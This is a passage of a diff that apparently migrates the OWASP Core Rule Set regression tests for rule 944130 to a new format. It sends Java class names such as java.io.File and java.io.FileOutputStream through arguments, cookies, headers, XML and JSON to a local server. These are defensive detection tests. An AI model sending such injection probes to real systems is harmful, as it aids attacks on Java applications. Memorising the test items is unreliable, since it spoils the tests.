"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log: + expect_ids: [944130] + - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 92 desc: "Cookie name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log: + expect_ids: [944130] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 104 desc: "Request header test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 112 desc: "Argument name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log: + expect_ids: [944130] + - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 